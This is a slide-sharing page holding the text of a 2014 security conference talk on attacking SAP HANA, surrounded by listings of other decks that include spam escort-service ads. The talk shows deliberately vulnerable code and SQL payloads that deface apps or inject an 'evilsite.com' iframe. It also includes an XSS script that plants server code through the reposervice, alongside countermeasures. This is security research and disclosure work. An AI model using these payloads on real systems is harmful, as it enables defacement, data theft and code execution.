What is SAP API Management_.pdfWhat is SAP API Management_.pdf
What is SAP API Management_.pdfBilawalAmeen
 
Future of Enterprise PaaS
Future of Enterprise PaaSFuture of Enterprise PaaS
Future of Enterprise PaaSSAP Technology
 
Syncfusion: Flat License Options
Syncfusion: Flat License OptionsSyncfusion: Flat License Options
Syncfusion: Flat License OptionsDomingo Rogers
 
AdminCamp 2018 - ApplicationInsights für Administratoren
AdminCamp 2018 - ApplicationInsights für AdministratorenAdminCamp 2018 - ApplicationInsights für Administratoren
AdminCamp 2018 - ApplicationInsights für AdministratorenChristoph Adler
 
vue-storefront - PWA eCommerce for Magento2 MM17NYC presentation
vue-storefront - PWA eCommerce for Magento2 MM17NYC presentationvue-storefront - PWA eCommerce for Magento2 MM17NYC presentation
vue-storefront - PWA eCommerce for Magento2 MM17NYC presentationDivante
 

Similar to Blended Web and Database Attacks on Real Time In-memory Platforms (20)

NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database AttacksNSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
 
Sap fundamentals overview_for_sap_minors
Sap fundamentals overview_for_sap_minorsSap fundamentals overview_for_sap_minors
Sap fundamentals overview_for_sap_minors
 
Inception of the SAP Platforms Brain: Attacks on SAP Solution Manager
Inception of the SAP Platforms Brain: Attacks on SAP Solution ManagerInception of the SAP Platforms Brain: Attacks on SAP Solution Manager
Inception of the SAP Platforms Brain: Attacks on SAP Solution Manager
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
 
SUSE Technical Webinar: Build HANA Apps in the Framework of the SAP and SUSE ...
SUSE Technical Webinar: Build HANA Apps in the Framework of the SAP and SUSE ...SUSE Technical Webinar: Build HANA Apps in the Framework of the SAP and SUSE ...
SUSE Technical Webinar: Build HANA Apps in the Framework of the SAP and SUSE ...
 
Introduction to NEW SAP - Accenture Technology Meetup
Introduction to NEW SAP - Accenture Technology MeetupIntroduction to NEW SAP - Accenture Technology Meetup
Introduction to NEW SAP - Accenture Technology Meetup
 
Building Custom Advanced Analytics Applications with SAP HANA
Building Custom Advanced Analytics Applications with SAP HANABuilding Custom Advanced Analytics Applications with SAP HANA
Building Custom Advanced Analytics Applications with SAP HANA
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
 
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
 
Datameer6 for prospects - june 2016_v2
Datameer6 for prospects - june 2016_v2Datameer6 for prospects - june 2016_v2
Datameer6 for prospects - june 2016_v2
 
Developing and Deploying Applications on the SAP HANA Platform
Developing and Deploying Applications on the SAP HANA PlatformDeveloping and Deploying Applications on the SAP HANA Platform
Developing and Deploying Applications on the SAP HANA Platform
 
SAP HANA SPS10- Multitenant Database Containers
SAP HANA SPS10- Multitenant Database ContainersSAP HANA SPS10- Multitenant Database Containers
SAP HANA SPS10- Multitenant Database Containers
 
Dev207 berlin
Dev207 berlinDev207 berlin
Dev207 berlin
 
Custom Development - SAP HANA
Custom Development - SAP HANACustom Development - SAP HANA
Custom Development - SAP HANA
 
What is SAP API Management_.pdf
What is SAP API Management_.pdfWhat is SAP API Management_.pdf
What is SAP API Management_.pdf
 
ImmixVegas
ImmixVegasImmixVegas
ImmixVegas
 
Future of Enterprise PaaS
Future of Enterprise PaaSFuture of Enterprise PaaS
Future of Enterprise PaaS
 
Syncfusion: Flat License Options
Syncfusion: Flat License OptionsSyncfusion: Flat License Options
Syncfusion: Flat License Options
 
AdminCamp 2018 - ApplicationInsights für Administratoren
AdminCamp 2018 - ApplicationInsights für AdministratorenAdminCamp 2018 - ApplicationInsights für Administratoren
AdminCamp 2018 - ApplicationInsights für Administratoren
 
vue-storefront - PWA eCommerce for Magento2 MM17NYC presentation
vue-storefront - PWA eCommerce for Magento2 MM17NYC presentationvue-storefront - PWA eCommerce for Magento2 MM17NYC presentation
vue-storefront - PWA eCommerce for Magento2 MM17NYC presentation
 

Recently uploaded

Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 

Recently uploaded (20)

Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 

Blended Web and Database Attacks on Real Time In-memory Platforms

  • 1. CONFIDENTIAL NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 1 3/4/15 1 Ezequiel Gutesman Blended Web and Database Attacks on Real-time, In-Memory Platforms
  • 2. 2NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 2 Disclaimer This publication is copyright 2014 Onapsis, Inc. – All rights reserved. This publication contains references to the products of SAP AG. SAP, R/3, xApps, xApp, SAP NetWeaver, Duet, PartnerEdge, ByDesign, SAP Business ByDesign, HANA, and other SAP products and services mentioned herein are trademarks or registered trademarks of SAP AG in Germany and in several other countries all over the world. SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials.
  • 3. 3NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 3 Agenda  In-Memory Platforms  HANA and the blended architecture  Threat vectors for SAP HANA  SQLi  XSS and XSJS  Rserve integration  C/C++ post exploitation  Conclusions
  • 4. 4In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 4NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 4 In-Memory Platforms/IMDB
  • 5. 5NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 5 • Simple concept – DBMS that primarily relies on main memory for computer data storage. – “It has been predicted that in-memory computing will be one of the Top 10 technologies of 2012” (Gartner) – Why didn’t it happen before? In-Memory Computing/IMDB
  • 6. 6In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 6NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 6 • Cost of physical memory going down • Increasing amount of data being processed • Higher requirements on system response • Innovation! – RT analytics Reasons
  • 7. 7In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 7NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 7 • “It’s orders-of-magnitude faster—like the difference between walking and flying in a plane” J. Loaiza, Oracle • "In my 20 years in SAP I have never seen such innovation." Rob Enslin, Head of Sales – SAP Main vendors • Oracle - Oracle 12c • Microsoft - MS SQL Server 2014 (Hekaton) • SAP - SAP HANA Some quotes and examples of what this really means…
  • 8. 8In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 8NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 8 Motivation
  • 9. 9In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 9NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 9 SAP, SAP HANA and the blended architecture
  • 10. 10NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 10
  • 11. 11NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 11 What is SAP? Largest provider of business management solutions in the world. ● More than 250.000 implementations around the globe. ● More than 60.000 employees. Used by Global Fortune-1000 companies, governmental organizations and defense agencies to run their every-day business processes. ● Such as Revenue / Production / Expenditure business cycles. SALES PRODUCTION FINANCIAL PLANNING INVOICING PROCUREMENT TREASURY LOGISTICS PAYROLL BILLING
  • 12. 12NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 12 What is SAP? Largest provider of business management solutions in the world. ● More than 250.000 implementations around the globe. ● More than 60.000 employees. Used by Global Fortune-1000 companies, governmental organizations and defense agencies to run their every-day business processes. ● Such as Revenue / Production / Expenditure business cycles. SALES PRODUCTION FINANCIAL PLANNING INVOICING PROCUREMENT TREASURY LOGISTICS PAYROLL BILLING HANA is SAP’s star product… new customers and existing customers will be pushed towards implementing HANA (both as back-end DB and application engine + DB)
  • 13. 13NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 13 A Business-Critical Infrastructure ● SAP and HANA systems store and process the most critical business information in the Organization. ● If these platforms are breached, an intruder would be able to perform different attacks such as: ESPIONAGE: Obtain customers/vendors/human resources data, financial planning information, balances, profits, sales information, manufacturing recipes, Stats & BI, etc. SABOTAGE: Paralyze the operation of the organization by shutting down the Applications running on HANA, disrupting interfaces with other systems and deleting critical information, etc. FRAUD: Modify financial information, tamper sales and purchase orders, create new vendors, modify vendor bank account numbers, etc.
  • 14. 14In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 14NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 14 © 2014 SAP AG or an SAP affiliate company. All rights reserved. • Full In-memory database • Integrated HTTP Server • Support for cloud implementations • Integrations with calc engines (R, SQL) • Diverse set of deployment options • Massive memory requirements • Used mainly for Business Applications SAP HANA
  • 15. 15In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 15NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 15 Attack Surface http://help.sap.com/saphelp_hanaplatform/helpdata/en/37/d2573cb24e4d75a23e8577fb4f73b7/content.htm • SQL/MDX port • HTTP service • SAP Host Agent and MC • Outgoing connections • Service Marketplace • Solution Manager • Mail servers • Other Web Serves • R servers • SAP Support
  • 16. 16In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 16NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 16 Typical web application scenario Typical web frameworks (asp, .NET, php, Django,…) use a DB connection configured with a single, sometimes full-privileged user. On this scenario you will have: • Application Level users • Database user • OS user to run HTTP server and DB server A blended architecture
  • 17. 17In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 17NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 17 SAP HANA web application scenario SAP HANA Web applications framework works differently. The application user is the same as the DB user. User privileges should be restricted at the DB level → The attack surface should be restricted per user. This requires: • Web Application/Database user • OS User running the DB (<dbsid>adm) A blended architecture
  • 18. 18In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 18NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 18 Typical webapps • SQLi could access the whole database • XSS is typically restricted • Code stored on the Filesystem • OS commands can be executed SAP HANA webapps • SQLi are restricted to the user privileges • XSS is more powerful by default • Code stored on the Database • Restricted OS comm. execution Impact of vulnerabilities
  • 19. 19In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 19NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 19 Programming Languages: • XSJS or XS Javascript. This is HANA’s version of Server Side Javascript. It is based on the SpiderMonkey Javascript engine. API’s and libraries are detailed in the HANA doc • Within the database, SQL and SQLscript used to access the info • R code / (L code for internal use). • ABAP is also tuned to run faster on HANA systems • HTML5 for mobile apps • C/C++ SAP HANA Concepts
  • 20. 20In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 20NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 20 HANA Studio: It is a full DB client that can be used to administrate the database XS IDE: A developer can create code to be deployed on the web server using the XS IDE available through the HTTP/s interface. http://hanaserver:8000/sap/hana/xs/ide/editor SAP HANA Concepts Development Environment
  • 21. 21In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 21NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 21 Attack vectors on SAP HANA
  • 22. 22In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 22NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 22 sqli.xsjs Because of HANA architecture, the queries are executed in the context of the user logged into the web application. var conn = $.db.getConnection(); var pstmt = conn.prepareStatement( "SELECT * FROM accounts WHERE custID='" + $.request.parameters.get("id")); var rs = pstmt.executeQuery(); sqli.php In most of the web application frameworks, the unique credentials are hardcoded into the application code or configuration. $conn = pg_connect("host=localhost port=5432 user=postgres password=123"); $query = "SELECT * FROM accounts WHERE custID=’$id’"; $result = pg_query($conn, $query); SQL Injection on HANA
  • 23. 23In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 23NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 23 sqli.xsjs Because of HANA architecture, the queries are executed in the context of the user logged into the web application. var conn = $.db.getConnection(); var pstmt = conn.prepareStatement( "SELECT * FROM accounts WHERE custID='" + $.request.parameters.get("id")); var rs = pstmt.executeQuery(); sqli.php In most of the web application frameworks, the unique credentials are hardcoded into the application code or configuration. $conn = pg_connect("host=localhost port=5432 user=postgres password=123"); $query = "SELECT * FROM accounts WHERE custID=’$id’"; $result = pg_query($conn, $query); SQL Injection on HANA It’s not only about WHAT is executed but more important about WHO executes it… so SQL injection attacks can be blended with Social Engineering to make the attacks more successful
  • 24. 24In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 24NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 24 UPDATE _SYS_REPO.ACTIVE_OBJECT set CDATA=’$.response.addBody("<iframe src=’http://www.evilsite.com’ height=0 width=0></iframe>")’ where OBJECT_SUFFIX='html' Well... it's a mix UPDATE _SYS_REPO.ACTIVE_OBJECT set CDATA=’$.response.addBody("PWNED")’ where OBJECT_NAME = 'demo' Example 1: deface http://[ip]/demo/democode/demo.xsjs with “PWNED”: Example 2: inject an attacker-controlled iframe in EVERY SINGLE APPLICATION: PKG SUBPKG OBJ Predictable by application path! iif the targeted user has write privileges over _SYS_REPO.ACTIVE_OBJECT
  • 25. 25In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 25NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 25 Time-travel SQL Injection
  • 26. 26In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 26NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 26 SAP HANA HISTORY Tables Reference : http://saphanatutorial.com/sap-hana-history-table/ SAP HANA Historical tables support time travel queries. These are performed against historical states of the database. So unless the user specifically deletes the historical data on the table, the information will remain there. History TABLES and SQL injections
  • 27. 27In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 27NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 27 • Create a HISTORY table – CREATE HISTORY COLUMN TABLE NAME (…); • List HISTORY tables – SELECT * FROM SYS.TABLES WHERE SESSION_TYPE = 'HISTORY'; • Access the HISTORY information – SELECT * FROM TABLE AS OF COMMIT ID XXXX; //may not work :S – SELECT * FROM TABLE WITH PARAMETERS ('REQUEST_FLAGS'= ('ALLROWS')) • Delete the HISTORY information – MERGE HISTORY DELTA of TABLE; History TABLES and SQL injection
  • 28. 28In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 28NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 28 DEMO SQL injection on HISTORY tables
  • 29. 29In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 29NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 29 • Use prepareStatement within the XSJS code • Never concatenate user input to a query string if it was not validated - :P • Restrict the privileges of all users, so they can access only the information (and tables) they need. • Consider whether you REALLY need a HISTORY table Countermeasures on SQLi
  • 30. 30In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 30NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 30 XSS and derived threats
  • 31. 31In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 31NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 31 XSS attacks are extremely powerful with the built-in functionality of the In-Memory platform: meet the reposervice! <script> var xsjs_payload = "var conn=$.db.getConnection(); var pstmt=conn.prepareStatement('<INSERT UPDATE QUERY OR ANY OTHER QUERY>'); var rs = pstmt.executeQuery();"; attack(); function attack(){ $.ajax({ url: "/sap/hana/xs/ide/editor/server/repo/reposervice.xsjs?activate=false&mode=create&path=[path to create the page]", data: xsjs_payload, type: "PUT", dataType: "text", contentType: "text/plain", processData: false, headers: { "X-CSRF-Token": securityToken }, });} </script> Cross Site Scripting Get this from a request in the payload
  • 32. 32In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 32NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 32 • Through different vulnerabilities, an attacker could be able to modify/execute XSJS code • If DB queries can be executed, the JS code itself can be modified: • Insecure ‘eval’ assignment: $.response.contentType = "text/html"; var remotefn = eval($.request.parameters.get("eval")); var eval_a = eval(remotefn); $.response.setBody("RESULT:<p>"+eval_a); XSJS Code Impossible? See https://service.sap.com/sap/support/notes/2015446 from June 2014!
  • 33. 33In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 33NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 33 A note on the ICM HANA “inherited” the ICM web server From the documentation(*): “For the ICM or a Web Dispatcher with a release status of SAP NetWeaver 7.0 or below, the pattern used by the ICM filter is, by default, a blacklist with the following structure: <s*script[^>]*>(.*)<s*/scripts*>” (*) http://help.sap.com/saphelp_nw73/helpdata/en/4e/2606c0c61920cee10000000a42189c/content.htm?current_toc=/en/ae/ad1640033ae569e10000000a155106/plain.htm
  • 34. 34In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 34NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 34 DEMO ICM (and HANA) Pattern filter bypass
  • 35. 35In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 35NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 35 • Restrict packages exposed via http • Secure authentication methods required for package access • Restrict Access privileges! – System, Application,Object,Analytic,Package,Users – Use restricted user types for HTTP apps. • Enable Cross-Site-Request Forgery (XSRF) Protection • Do not rely ONLY on Patterns or magic escapes –Validate all parameters! • Consider built-in helpers like HTML5 Sanitizer(*) Countermeasures (*) http://help.sap.com/saphelp_hanaplatform/helpdata/en/23/15f02c34a04ed9b7ff6e79db44c701/content.htm?frameset=/en/91/f0bd316f4d1014b6dd926db0e91070/frameset.htm&current_toc=/en/d0/1cd0b7be7f441cb6 c56ad4577b428c/plain.htm&node_id=329
  • 36. 36In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 36NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 36 HANA/R Integration
  • 37. 37In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 37NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 37 SAP HANA can be integrated with R-server “R is an open source programming language and software environment for statistical computing and graphics… The R language is widely used for advanced data analysis.” CREATE PROCEDURE MY_Func(OUT result “SCHEMA".“TTYPE") LANGUAGE RLANG AS BEGIN ### RCODE HERE END; © 2014 SAP AG or an SAP affiliate company. All rights reserved. Integration with R-lang
  • 38. 38In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 38NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 38 • R-Serve must be installed on a separate host – Remote connections must be enabled • R-serve exposes high privileged functions – remote shutdown of the service – os command execution (with the privileges of the user running the server) Attacks to the R Integration
